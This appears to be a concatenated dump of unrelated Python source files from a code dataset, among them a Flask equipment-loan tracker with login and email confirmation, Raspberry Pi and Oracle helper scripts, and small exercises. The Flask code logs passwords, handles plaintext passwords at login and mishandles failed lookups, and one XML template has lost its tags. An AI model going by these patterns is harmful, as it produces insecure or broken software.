----------------------------\n# \n# ----------------------------\n\n","sub_path":"discover_gigs/scrapers.py","file_name":"scrapers.py","file_ext":"py","file_size_in_byte":6516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"72013739","text":"import json\n\n\nclass SanityLibrary:\n\n def get_flow_content(self, tid=1, fid=1, priority=1):\n\n flow_template = '''\n\n false\n \n \n 0\n \n \n 0\n \n \n \n \n \n %s\n %s\n 4294967295\n false\n \n \n \n 2048\n \n \n 10.0.0.1\n \n %s\n %s\n %s\n false\n'''\n\n flow_data = flow_template % (tid, fid, fid, 'TestFlow-{0}'.format(fid), priority)\n return flow_data\n\n def is_cluter_set_up(self, rsp1, rsp2, rsp3):\n try:\n states = []\n for r in [rsp1, rsp2, rsp3]:\n rj = json.loads(r)\n states.append(rj['value']['RaftState'])\n states.sort()\n if states == ['Follower', 'Follower', 'Leader']:\n return True\n except Exception:\n return False\n return False\n\n def get_persistence(self, rsp):\n try:\n rj = json.loads(rsp)\n return rj['module'][0]['distributed-datastore-provider:config-properties']['persistent']\n except:\n pass\n","sub_path":"test/tools/OF_Test/robot_suites/500__OF_Cluster_Sanity_OF/SanityLibrary.py","file_name":"SanityLibrary.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541397044","text":"# Verificação de expressões\n\nconta = 0\ncontf = 0\nexpre = str(input(\"Digite uma expressão: \"))\n\nfor i in range(0, len(expre)):\n if expre[i] == \"(\":\n conta += 1\n if expre[i] == \")\":\n contf += 1\nif conta == contf:\n print(\"Está expressão é valida!\")\nelse:\n print(\"Está expressão não é válida!\")","sub_path":"Mundo 3/Exercícios/ex_083.py","file_name":"ex_083.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"332112967","text":"#!/usr/bin/python\n\nimport RPi.GPIO as GPIO\nimport time\nimport subprocess\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(13,GPIO.IN,pull_up_down=GPIO.PUD_UP)\n\nbtn_down = 0\n\nwhile True:\n if GPIO.input(13) == True:\n btn_down += 1\n print(\"Button down for \", 5-btn_down)\n else:\n btn_down = 0\n\n if btn_down > 4:\n print(\"Shuting down, now!\")\n subprocess.call(\"halt\")\n GPIO.cleanup()\n break\n time.sleep(1)","sub_path":"System/Device/RPi.GPIO.py","file_name":"RPi.GPIO.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593257449","text":"import random\r\n# 新建列表类型存储字符串和数字\r\nstrs = []\r\n# 添加字符\r\nfor i in (65,97):\r\n for j in range(26):\r\n strs += chr(i+j)\r\n# 添加数字\r\nfor i in range(10):\r\n strs += str(i)\r\n# 输出10个8位的密码\r\nfor i in range(10):\r\n print(\"密码\", i+1, \":\",end= '')\r\n for j in range(8):\r\n print(strs[random.randint(0,61)], end= '')\r\n print()\r\n","sub_path":"6.1.py","file_name":"6.1.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83890361","text":"import os\nimport csv\nimport sys\nimport time\n\nfrom util import csv_preprocss, string_preprocess, record_word_frequency\n\nitem_path = sys.argv[1]\nfile_length = int(sys.argv[2])\n\nif(not os.path.exists(item_path)):\n assert False, \"第一个命令行参数必须输入有效路径\"\n\ncol = csv.register_dialect('mydialect',delimiter='\\t',quoting=csv.QUOTE_ALL)\n\ninfo_dict = None\ninfo_length = 0\nvalid_line = []\nwith open(item_path, 'r') as f:\n file_list = csv.reader(f, 'mydialect')\n valid_line.append(next(file_list))\n valid_length = len(valid_line[0])\n for i in range(file_length):\n try:\n content = next(file_list)\n if(len(content) != valid_length): continue\n valid_line.append(content) \n info_length += 1\n except:\n print(\"{} line bad.\".format(i+1))\n \n info_dict = csv_preprocss(valid_line)\n\nbase_name = os.path.split(item_path)[1].split('.')[0]\n\nwith open(base_name + '_benchmark.txt', 'w') as f:\n for line in valid_line:\n line = ''.join([x+'\\t' for x in line])\n f.write(line + '\\n')\n\nwith open(base_name + '.txt', 'w') as f:\n f.write('marketplace customer_id string encode\\n')\n string = \"\"\n length = 0\n word_list = []\n line_list = []\n start = time.time()\n for i in range(info_length):\n market_info = info_dict['marketplace'][i]\n customer_id_info = info_dict['customer_id'][i]\n string = info_dict['review_body'][i]\n string = string_preprocess(string)\n line_list.append([market_info, customer_id_info, string])\n for word in string:\n word_list.append(word)\n end = time.time()\n\n word_list_sorted = record_word_frequency(word_list, base_name + '_word_info.txt')\n\n for line in line_list:\n encode_list = [str(word_list_sorted.index(x)) + '_' for x in line[-1]]\n encode_str = ''.join(encode_list)\n f.write('{} {} {} {}\\n'.format(*tuple(line), encode_str))\n","sub_path":"C题/do.py","file_name":"do.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"435486999","text":"from datetime import datetime\r\nfrom cx_Oracle import connect\r\n\r\nfrom models import Debtor, Premise, Rate, Address, Invoice, PTJ, Payment, Reading\r\n\r\ndef get_database_connection():\r\n db_connect = connect('foo', 'bar', 'baz')\r\n db_cursor = db_connect.cursor()\r\n\r\n return (db_connect, db_cursor)\r\n\r\ndef close_database_connection(connection):\r\n db, cursor = connection\r\n\r\n db.close()\r\n\r\ndef get_debtor_details(debtor, connection):\r\n connect, cursor = connection\r\n\r\n query = Debtor.get_query(debtor.debtornum)\r\n\r\n details = cursor.execute(query).fetchone()\r\n\r\n if details:\r\n debtor.firstname = details[0]\r\n debtor.surname = details[1]\r\n debtor.company_code = details[2]\r\n debtor.on_ebill = details[3]\r\n debtor.phone_number = details[4]\r\n debtor.email_address = details[5]\r\n\r\n debtor.save()\r\n\r\ndef get_address_details(premise, connection):\r\n connect, cursor = connection\r\n query = Address.get_query(premise.premnum)\r\n\r\n row = cursor.execute(query).fetchone()\r\n\r\n address = Address()\r\n address.street_name = row[0]\r\n address.street_number = row[1]\r\n address.city = row[2]\r\n address.state = row[3]\r\n address.postal = row[4]\r\n address.save()\r\n\r\n return address\r\n\r\ndef get_last_rate(debtor, premise, connection):\r\n connect, cursor = connection\r\n rate_query = Rate.get_query(debtor.debtornum, premise.premnum)\r\n\r\n\r\n row = cursor.execute(rate_query).fetchone()\r\n\r\n rate = Rate()\r\n rate.offer = row[0]\r\n rate.rate = row[1]\r\n rate.effective_from = row[2]\r\n rate.effective_to = row[3]\r\n rate.save()\r\n\r\n return rate\r\n\r\ndef get_last_reading(debtor, premise, connection):\r\n connect, cursor = connection\r\n\r\n query = Reading.get_query(debtor.debtornum, premise.premnum)\r\n\r\n row = cursor.execute(query).fetchone()\r\n\r\n reading, created = Reading.objects.get_or_create(reading=row[0], read_date=row[1], read_method=row[2], invoice_num=row[3])\r\n\r\n return reading\r\n\r\ndef get_premises(debtor, connection):\r\n connect, cursor = connection\r\n premises = []\r\n\r\n query = Premise.get_query(debtor.debtornum)\r\n\r\n for row in cursor.execute(query).fetchall():\r\n try:\r\n premise = Premise.objects.get(premnum__exact=row[0])\r\n except Premise.DoesNotExist:\r\n premise = Premise()\r\n\r\n premise.premnum = row[0]\r\n premise.debtor = debtor\r\n premise.esiid = row[1]\r\n premise.start_date = row[2]\r\n premise.status = row[3]\r\n premise.address = get_address_details(premise, connection)\r\n premise.rate = get_last_rate(debtor, premise, connection)\r\n premise.reading = get_last_reading(debtor, premise, connection)\r\n premise.end_date = row[4]\r\n premise.save()\r\n\r\n premises.append(premise)\r\n\r\n return premises\r\n\r\ndef get_last_payment(debtor, connection):\r\n connect, cursor = connection\r\n\r\n query = Payment.get_query(debtor.debtornum)\r\n\r\n row = cursor.execute(query).fetchone()\r\n\r\n payment, created = Payment.objects.get_or_create(debtor=debtor, date_received=row[0], payment_amt=row[1], channel=row[2])\r\n\r\ndef get_last_invoice(debtor, connection):\r\n connect, cursor = connection\r\n\r\n query = Invoice.get_query(debtor.debtornum)\r\n\r\n row = cursor.execute(query).fetchone()\r\n\r\n invoice, created = Invoice.objects.get_or_create(invoice_num__exact=row[0])\r\n invoice.debtor = debtor\r\n invoice.invoice_num = row[0]\r\n invoice.invoice_date = row[1]\r\n invoice.invoice_amt = row[2]\r\n invoice.due_date = row[3]\r\n invoice.save()\r\n\r\ndef get_recent_ptjs(debtor, connection):\r\n connect, cursor = connection\r\n\r\n query = PTJ.get_query(debtor.debtornum)\r\n\r\n for row in cursor.execute(query).fetchall():\r\n try:\r\n ptj = PTJ.objects.get(ptj_number__exact=row[0])\r\n except PTJ.DoesNotExist:\r\n ptj = PTJ()\r\n\r\n try:\r\n premise, created = Premise.objects.get_or_create(premnum=row[5])\r\n except:\r\n premise = None\r\n\r\n ptj.ptj_number = row[0]\r\n ptj.debtor = debtor\r\n ptj.premise = premise\r\n ptj.type_code = row[1]\r\n ptj.class_code = row[2]\r\n ptj.subclass_code = row[3]\r\n ptj.status_code = row[4]\r\n ptj.date_logged = row[6]\r\n ptj.date_status = row[7]\r\n ptj.save()\r\n\r\ndef get_details(debtornum):\r\n connection = get_database_connection()\r\n\r\n try:\r\n debtor = Debtor.objects.get(debtornum__exact=debtornum)\r\n created = False\r\n except Debtor.DoesNotExist:\r\n debtor = Debtor(debtornum=debtornum)\r\n created = True\r\n\r\n if created or (datetime.now() - debtor.last_modified).days > 0:\r\n # been more than a day since we updated, let's update the info, or a new debtor\r\n #get_debtor_details(debtor, connection)\r\n pass\r\n\r\n get_debtor_details(debtor, connection)\r\n\r\n # get our premises for the debtor\r\n get_premises(debtor, connection)\r\n\r\n # get our invoices for the debtor\r\n get_last_invoice(debtor, connection)\r\n\r\n get_last_payment(debtor, connection)\r\n\r\n # and PTJs, maybe???\r\n #get_recent_ptjs(debtor, connection)\r\n\r\n close_database_connection(connection)\r\n\r\n return debtor\r\n","sub_path":"ninetypercent/details/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"351193149","text":"from __future__ import print_function # In python 2.7\nfrom flask import render_template, flash, redirect, session, url_for, request, g\nfrom urlparse import urlparse, urljoin\nimport smtplib, re\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\nimport sys\nfrom sqlalchemy import cast\nfrom sqlalchemy.sql.expression import cast\nfrom sqlalchemy import Column, Integer, Sequence, types, Float, String\n\nimport sqlalchemy\nfrom datetime import date, datetime, time, timedelta\nimport pytz\nfrom flask.ext.mail import Message\nfrom pytz import timezone\nimport time\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom datetime import datetime\nfrom app import app, db, lm, admin, BaseView, expose, ModelView, bcrypt, mail, SQLAlchemy\nfrom .forms import searchForm, newEntryForm, item_choices, day_choices, search_choices, loginForm, registrationForm\nfrom .models import Entry, User, Log, adminEmails\nfrom itsdangerous import URLSafeTimedSerializer\n\nclass MyView(BaseView):\n @expose('/')\n def index(self):\n \n return self.render('AdminIndex.html')\n \nadmin.add_view(MyView(name='Welcome'))\nadmin.add_view(ModelView(User, db.session))\nadmin.add_view(ModelView(Entry, db.session))\nadmin.add_view(ModelView(adminEmails, db.session))\n\nsydney = timezone('Australia/Sydney')\nau_time = datetime.now(sydney)\n\ncurrDate = au_time.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n#print (\"dd/mm/yyyy format = %s/%s/%s\" % (dueDate.day, dueDate.month, dueDate.year), file=sys.stderr )\n\nallEmails = adminEmails.query.all()\nif allEmails:\n adminEmail = allEmails[0].adminEmail\n notifEmail = allEmails[0].notifEmail\n\n print(adminEmail, notifEmail)\ndef lower(string):\n return string.lower()\n\ndef update_loans():\n entries = Entry.query.all()\n if entries:\n au_time = datetime.now(sydney)\n currDate = au_time.strftime(\"%d/%m/%Y %H:%M:%S\")\n d1 = datetime.strptime(currDate, '%d/%m/%Y %H:%M:%S')\n d1 = d1.date()\n for entry in entries:\n\n if (entry.dueDate != None):\n dueDate = (entry.dueDate)\n dueDate = dueDate.strftime('%d/%m/%Y %H:%M:%S')\n \n #currDate = time.strftime(dueDate, \"%d/%m/%Y\")\n print (d1, dueDate, file=sys.stderr)\n d2 = datetime.strptime(dueDate, '%d/%m/%Y %H:%M:%S')\n d2 = d2.date()\n \n print(d1,d2)\n daysRemaining = ((d2 - d1).days)\n print (\"Testing\",file=sys.stderr)\n print(entry.days_remaining, daysRemaining, file=sys.stderr)\n print(entry.first_name, file=sys.stderr)\n\n if daysRemaining >= 0: \n entry.days_remaining = int(daysRemaining)\n else:\n daysRemaining = 0\n entry.days_remaining = int(daysRemaining)\n\n #if entry.days_remaining == 0:\n\n db.session.commit()\n sendEmailEntry()\n\ndef is_safe_url(target):\n ref_url = urlparse(request.host_url)\n test_url = urlparse(urljoin(request.host_url, target))\n return test_url.scheme in ('http', 'https') and \\\n ref_url.netloc == test_url.netloc\n\n@app.before_request\ndef before_request():\n if current_user.is_authenticated:\n g.user = None # return username in get_id()\n print(\"its authentic\")\n else:\n g.user = current_user\n print(\"its something\")\n \n #if current_user.id:\n # print(\"found an id\")\n\n@lm.user_loader\ndef user_loader(id):\n print (\"the id is:\")\n print (id, file=sys.stderr)\n user = User.query.get(id)\n if user:\n print (\"User found for\")\n print(user.id, file=sys.stderr)\n return User.query.get(int(id))\n else:\n print (\"We got here instead\")\n return None\n\n@app.context_processor\ndef inject_user():\n if current_user.is_authenticated:\n return dict(user=user_loader(current_user.id))\n else:\n user = \"hello\"\n return dict(user=current_user)\n \n@app.route(\"/\", methods=['GET', 'POST'])\n@login_required\ndef main():\n #user = user_loader(current_user.id)\n if current_user.is_authenticated:\n g.user = user_loader(current_user.id)\n print (\"the user is:\")\n print (g.user.id, file=sys.stderr)\n if request.method == 'POST':\n if request.form['btn'] == 'Submit':\n au_time = datetime.now(sydney)\n\n currDate = au_time.strftime(\"%d/%m/%Y %H:%M:%S\")\n form = newEntryForm(request.form)\n #flash('Record was successfully added')\n print(form.firstName, file=sys.stderr)\n integer = int(form.item.data)\n item_display = item_choices[integer][1]\n print(\"Hello there\")\n day_integer = int(form.duration.data) \n print(\"the day integer is:\", day_integer)\n day_display = day_integer #need to fix this\n print(\"the day display is:\", day_display)\n\n currrDate = datetime.strptime(currDate, '%d/%m/%Y %H:%M:%S')\n due_date = datetime.strptime(currDate, '%d/%m/%Y %H:%M:%S') + timedelta(days=day_integer)\n\n #if form.validate():\n print(day_display, file=sys.stderr)\n print(\"hello there\", file=sys.stderr)\n print(\"the date is:\", day_integer, due_date, file=sys.stderr)\n\n if (item_display == \"Other\"):\n entry = Entry(first_name=form.firstName.data, last_name=form.lastName.data, quantity=form.quantity.data, item = form.body.data, asset = form.asset.data, duration = day_display, dueDate = due_date, \n days_remaining = day_display, create_date = currrDate, status=\"On Loan\", tech=g.user.username,notes = form.notes.data)\n else:\n entry = Entry(first_name=form.firstName.data, last_name=form.lastName.data, quantity=form.quantity.data, item = item_display,asset = form.asset.data, duration = day_display, dueDate = due_date, \n days_remaining = day_display, create_date = currrDate, status=\"On Loan\", tech=g.user.username, notes = form.notes.data)\n\n db.session.add(entry)\n db.session.commit()\n\n flash('Record was successfully added')\n\n return redirect(url_for('main')) # else:\n #return render_template('index.html', form = form)\n else:\n return render_template('viewEntry.html', user = g.user, entries = Entry.query.all())\n else:\n #Calculate the days remaining\n #update_loans()\n \n \n return render_template('index.html', user = g.user, form = newEntryForm(), entries = Entry.query.all())\n\ndef generate_confirmation_token(email):\n serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])\n return serializer.dumps(email, salt=app.config['SECURITY_PASSWORD_SALT'])\n\ndef confirm_token(token, expiration=3600):\n serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])\n try:\n email = serializer.loads(\n token,\n salt=app.config['SECURITY_PASSWORD_SALT'],\n max_age=expiration\n )\n except:\n return False\n return email\n\ndef sendEmailConfirm(to, subject, template):\n msg = Message(\n subject,\n recipients=[to],\n html=template,\n sender=(\"List3r\", app.config['MAIL_DEFAULT_SENDER'])\n )\n mail.send(msg)\n \ndef sendEmailEntry():\n \n results = Entry.query.filter(cast(Entry.days_remaining, sqlalchemy.String).ilike(\"%\"+ \"0\" +\"%\"), Entry.status.ilike(\"%\"+ \"On Loan\" +\"%\")).all()\n if results:\n subject = \"Service Desk Loans Due\"\n \n msg = Message(\n subject,\n recipients=[notifEmail],\n html = render_template('loanDue.html', entries=results),\n sender=(\"List3r\", app.config['MAIL_DEFAULT_SENDER'])\n )\n mail.send(msg)\n\n print(\"email has been sent\")\n flash(\"update email sent\")\n else: \n print(\"theres no loans due\")\n\n\n@app.route('/delete', methods=['POST'])\ndef delete_entry():\n g.user = user_loader(current_user.id)\n\n if request.method == 'POST':\n entry = Entry.query.get(request.form['entry_to_delete'])\n entry.status = \"Returned\"\n date = datetime.strptime(currDate, '%d/%m/%Y %H:%M:%S')\n date = date.strftime('%d/%m/%Y')\n entry.date_returned = str(date) + \", \" + str(g.user.username)\n entry.days_remaining = 0\n print(\"we are printing\", file=sys.stderr)\n print(entry.first_name, file=sys.stderr)\n #log = Log(first_name=entry.first_name, last_name=entry.last_name, item = entry.item, action = \"Deleted\", tech = entry.tech, date = datetime.strptime(currDate, '%d/%m/%Y')) \n #db.session.add(log)\n #Entry.query.filter_by(id=request.form['entry_to_delete']).delete()\n db.session.commit()\n \n return redirect(url_for('main'))\n\n@app.route('/Entry/', methods=['GET', 'POST'])\n@login_required\ndef view_entry(entry_id):\n print(\"the page is\")\n print (request.referrer, file=sys.stderr)\n print (request.endpoint, file=sys.stderr)\n fetched_entry=Entry.query.filter_by(id=entry_id).first()\n print(fetched_entry.first_name, file=sys.stderr)\n return render_template('viewEntry.html', entry=fetched_entry, prevPage = request.referrer)\n\n@app.route('/Search/', methods=['GET', 'POST'])\n@login_required\ndef search_entry():\n if request.method == 'POST':\n form1 = searchForm(request.form)\n \n integer = int(form1.category.data)\n search_cat = search_choices[integer][1]\n \n print(\"GOING IN\", file=sys.stderr)\n print(form1.searchField.data, file=sys.stderr)\n if search_cat == \"iD\":\n results = Entry.query.filter_by(id=form1.searchField.data).all()\n elif search_cat == \"Client\":\n results = Entry.query.filter((Entry.first_name.ilike(\"%\"+ form1.searchField.data +\"%\")) | (Entry.last_name.ilike(\"%\"+ form1.searchField.data +\"%\")) ).all()\n elif search_cat == \"Item\":\n results = Entry.query.filter(Entry.item.ilike(\"%\"+ form1.searchField.data +\"%\")).all()\n elif search_cat == \"Asset\":\n results = Entry.query.filter(Entry.asset.ilike(\"%\"+ form1.searchField.data +\"%\")).all()\n elif search_cat == \"Tech\":\n results = Entry.query.filter(Entry.tech.ilike(\"%\"+ form1.searchField.data +\"%\")).all()\n elif search_cat == \"Days Remaining\":\n results = Entry.query.filter(cast(Entry.days_remaining, sqlalchemy.String).ilike(\"%\"+ form1.searchField.data +\"%\")).all()\n else:\n results = []\n \n return render_template('searchEntry.html', form = searchForm(), results = results)\n else:\n return render_template('searchEntry.html', form = searchForm())\n\nif __name__ == \"__main__\":\n app.run()\n \n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"For GET requests, display the login form. For POSTS, login the current user\n by processing the form.\"\"\"\n #print dbprint(\"Username is:\")\n\n form = loginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data.lower()).first()\n \n print(\"Username is:\")\n print(user.username)\n print(\"password is:\")\n print(user.password)\n if len(user.password) < 25:\n user.set_password(user.password)\n \n if user:\n if bcrypt.check_password_hash(user.password, form.password.data) and user.authenticated == True:\n #user.authenticated = True\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=False)\n flash('Logged in successfully.')\n next = request.args.get('next')\n # is_safe_url should check if the url is safe for redirects.\n # See http://flask.pocoo.org/snippets/62/ for an example.\n #if not is_safe_url(next):\n print (\"got ere\")\n\n return redirect(next or url_for('main'))\n # return redirect(\"/\")\n next = request.args.get('next')\n print (\"got hereeee\")\n return render_template(\"login.html\", form=form, next=next)\n\n@app.route(\"/history\", methods=[\"GET\"])\ndef history():\n return redirect(url_for('main'))\n #return render_template(\"history.html\", logs = Log.query.all())\n \n@app.route(\"/about\", methods=[\"GET\"])\ndef about():\n return render_template(\"about.html\")\n\n@app.route(\"/verifyMessage\", methods=[\"GET\"])\ndef verifyMessage():\n \"\"\"Message asking them to check their emails\"\"\"\n return render_template(\"checkEmail.html\")\n\n@app.route(\"/confirmed\", methods=[\"GET\"])\ndef confirmed():\n \"\"\"account confirmed\"\"\"\n return render_template(\"activated.html\")\n\ndef hasNumbers(inputString):\n return any(char.isdigit() for char in inputString)\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n form = registrationForm()\n \"\"\"\n user = User(\n email=form.email.data,\n password=form.password.data,\n confirmed=False\n )\n\n \"\"\"\n \n if request.method == \"POST\" and form.validate():\n #must be knox email address\n usernameF = form.username.data\n usernameF = usernameF.lower()\n emailF = form.email.data\n passwordF = form.password.data\n passwordF = bcrypt.generate_password_hash(passwordF).decode('utf-8')\n domain = re.search(r'@\\w+(.*)', emailF).group()\n print(\"the domain is:\", domain)\n\n #check if user exists\n checkUsername = User.query.filter_by(username=usernameF)\n checkEmail = User.query.filter_by(email=emailF)\n if checkUsername.count() > 0 or checkEmail.count() > 0 or hasNumbers(emailF) or domain != \"@knox.nsw.edu.au\":\n if checkUsername.count() > 0:\n flash(\"That username is already taken, please choose another\")\n return render_template('signup.html', form=form, message=\"Username taken\")\n elif checkEmail.count() > 0:\n flash(\"That email is already taken, please choose another\")\n return render_template('signup.html', form=form, message=\"Email taken\")\n else:\n flash(\"Use knox email address\")\n return render_template('signup.html', form=form, message=\"Please use Knox email\")\n else:\n #enter user into database\n user = User(username=usernameF, password = passwordF, email = emailF, authenticated = False, confirmed = False)\n token = generate_confirmation_token(user.email)\n\n flash(\"Thanks for registering!\")\n \n confirm_url = url_for('confirm_email', token=token, _external=True)\n html = render_template('activate.html', confirm_url=confirm_url)\n subject = \"Please confirm your email\"\n \n sendEmailConfirm(emailF, subject, html)\n \n db.session.add(user)\n db.session.commit()\n return redirect(url_for('verifyMessage'))\n else:\n flash(\"didnt specify validation\")\n \n return render_template(\"signup.html\", form=form)\n \n \n@app.route(\"/logout\", methods=[\"GET\"])\ndef logout():\n \"\"\"Logout the current user.\"\"\"\n print(\"user logged out eyyy\")\n #user = current_user\n #user.authenticated = False\n #db.session.add(user)\n #db.session.commit()\n logout_user()\n return redirect(url_for('main')) \n\n\n@app.route(\"/confirm/\", methods=[\"GET\"])\ndef confirm_email(token):\n try:\n email = confirm_token(token)\n except:\n flash('The confirmation link is invalid or has expired.', 'danger')\n user = User.query.filter_by(email=email).first_or_404()\n if user.confirmed:\n flash('Account already confirmed. Please login.', 'success')\n else:\n user.confirmed = True\n user.authenticated = True\n user.confirmed_on = au_time \n db.session.add(user)\n db.session.commit()\n flash('You have confirmed your account. Thanks!', 'success')\n \n return redirect(url_for('confirmed'))","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"596180294","text":"# Converting a normal (12-hour) time like \"8:30 am\" or \"8:30 pm\" to 24-hour time\n# (like \"0830\" or \"2030\") sounds easy enough, right? Well, let's see if you can do it!\n#\n# You will have to define a function named \"to24hourtime\", and you will be given an hour\n# (always in the range of 1 to 12, inclusive), a minute (always in the range of 0 to 59, inclusive),\n# and a period (either \"am\" or \"pm\") as input.\n#\n# Your task is to return a four-digit string that encodes that time in 24-hour time.\n\n\ndef to24hourtime(hour, minute, period):\n if hour < 12:\n hour = hour if period == 'am' else hour + 12\n return str(hour).rjust(2,\"0\") + str(minute).rjust(2,\"0\")\n\n\nprint(to24hourtime(1, 2, \"am\"))\n\n# Clever oneliner\n\n# def to24hourtime(hour, minute, period):\n# return '%02d%02d' % (hour % 12 + 12 * (period == 'pm'), minute)\n","sub_path":"Datetime/converting_12_to_24_hour.py","file_name":"converting_12_to_24_hour.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"547637803","text":"#Is my friend cheating?\n\ndef removNb(n):\n ### TIMED OUT! ###\n #l=[]\n #gauss = n*(n+1)/2\n #for i in range(1,n+1):\n #for j in range(1,n+1):\n #if int(((i*j)+i+j))==int(gauss):\n #l.append(tuple((i,j)))\n #return l\n l=[]\n gauss = n*(n+1)/2\n for i in range(1,n+1):\n j = (gauss - i)/(i+1)\n if j<=n and j.is_integer():\n l.append((i, int(j)))\n return l\n\n#Maximum subarray sum\n\ndef maxSequence(arr):\n max_ending_here = max_so_far = 0\n for x in arr:\n max_ending_here = max(x, max_ending_here + x)\n max_so_far = max(max_so_far, max_ending_here)\n return max_so_far\n\n#Perimeter of squares in a rectangle\n\ndef perimeter(n):\n a=1\n b=1\n l=[a,b]\n if n<0:\n print(\"Incorrect input\")\n elif n == 0:\n return a\n elif n == 1:\n return b\n else:\n for i in range(2,n+1):\n c=a+b\n l.append(c)\n a=b\n b=c\n return 4*sum(l)\n\n#Rot13\n\nimport string\nfrom codecs import encode as _dont_use_this_\n\ndef rot13(message):\n alphabet = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n rot13alphabet = \"nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM\"\n rot13 = string.maketrans(alphabet,rot13alphabet)\n return string.translate(message,rot13)\n\n","sub_path":"5Kyu_Katas.py","file_name":"5Kyu_Katas.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"477196107","text":"def is_prime(p, old_primes):\n \"\"\"Return True if 'p' is prime.\n\n 'old_primes' is list of primes so far.\n \"\"\"\n\n if old_primes[p]: # already found prime?\n return True\n\n if (p % 2) == 0: # check 2 divisor first\n return False\n\n # now check if any older primes can divide evenly\n for i in range(3, int(p**0.5)+1, 2):\n if (p % i) == 0:\n return False\n\n # 'p' is prime, remember in 'old_primes' and return True\n old_primes[p] = True\n return True\n\ndef step(g, m, n):\n \"\"\"Find two primes p and p' in [m, n] such that p' = p + g.\n\n Return result pair [p, p'] where p < p'.\n Return None if no step pair found in [m, n].\n \"\"\"\n\n # list of which integers are primes\n primes = [False] * (n+1)\n\n # scan upwards from 'm' looking for primes\n if (m % 2) == 0: # if 'm' is even, move up to next odd\n m += 1\n for x in range(m, n-g+1, 2):\n if is_prime(x, primes) and is_prime(x+g, primes):\n return [x, x+g]\n","sub_path":"reddit_replies/code_wars_prime_step/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"557326593","text":"#! /usr/bin/env python3\nnewline = False\n\n\ndef read_problem():\n return tuple(int(c) for c in input().split())\n\n\ndef solve(problem):\n B, M = problem\n if M > 2 ** (B - 2):\n return None\n if M == 2 ** (B - 2):\n first = '0' + '1' * (B - 1)\n else:\n first = bin(M)[2:]\n fmt = \"{0:0\" + str(B - 1) + \"b}\"\n first = fmt.format(M) + '0'\n return [first] + ['0' * i + '1' * (B - i) for i in range(2, B + 1)]\n\n\ndef print_solution(slides):\n if slides is None:\n print(\"IMPOSSIBLE\")\n else:\n print(\"POSSIBLE\")\n print(*slides, sep='\\n')\n\n\ncases = int(input())\nfor n in range(1, cases + 1):\n problem = read_problem()\n solution = solve(problem)\n print(\"Case #{0}:\".format(n), end='\\n' if newline else ' ')\n print_solution(solution)\n","sub_path":"solutions_5744014401732608_1/Python/314eter/slides.py","file_name":"slides.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"63542201","text":"import json\nfrom graph import Graph\nfrom game_components.train import Train\nfrom game_components.game_points import *\n\n\ndef read_graph_from_json(filename):\n with open(filename) as json_data:\n graph = json.load(json_data)\n return graph\n\n\ndef dict_to_graph(layer0):\n graph = Graph(idx=layer0['idx'], name=layer0['name'])\n for point in layer0['points']:\n graph.add_vertex(idx=point['idx'], post_idx=point['post_idx'])\n for line in layer0['lines']:\n graph.add_edge(idx=line['idx'], length=line['length'], vert_from=line['points'][0], vert_to=line['points'][1])\n return graph\n\n\ndef dict_to_trains(layer1):\n trains = {}\n for train in layer1['trains']:\n trains[train['idx']] = dict_to_train(train)\n return trains\n\n\ndef dict_to_train(dictionary):\n return Train(idx=dictionary['idx'], speed=dictionary['speed'], line_idx=dictionary['line_idx'],\n position=dictionary['position'], player_idx=dictionary['player_idx'])\n\n\ndef dict_to_posts(layer1):\n posts = layer1['posts']\n result = {}\n for post in posts:\n if post['type'] == 1:\n result[post['idx']] = dict_to_town(post)\n elif post['type'] == 2:\n result[post['idx']] = dict_to_market(post)\n elif post['type'] == 3:\n result[post['idx']] = dict_to_storage(post)\n return result\n\n\ndef dict_to_town(dictionary):\n return Town(idx=dictionary['idx'], point_idx=dictionary['point_idx'], name=dictionary['name'], population=dictionary['population'], population_capacity=['population_capacity'],\n armor=dictionary['armor'], armor_capacity=dictionary['armor_capacity'], product=dictionary['product'],\n product_capacity=dictionary['product_capacity'])\n\n\ndef dict_to_market(dictionary):\n return Market(idx=dictionary['idx'], point_idx=dictionary['point_idx'], name=dictionary['name'],\n product=dictionary['product'], product_capacity=dictionary['product_capacity'], 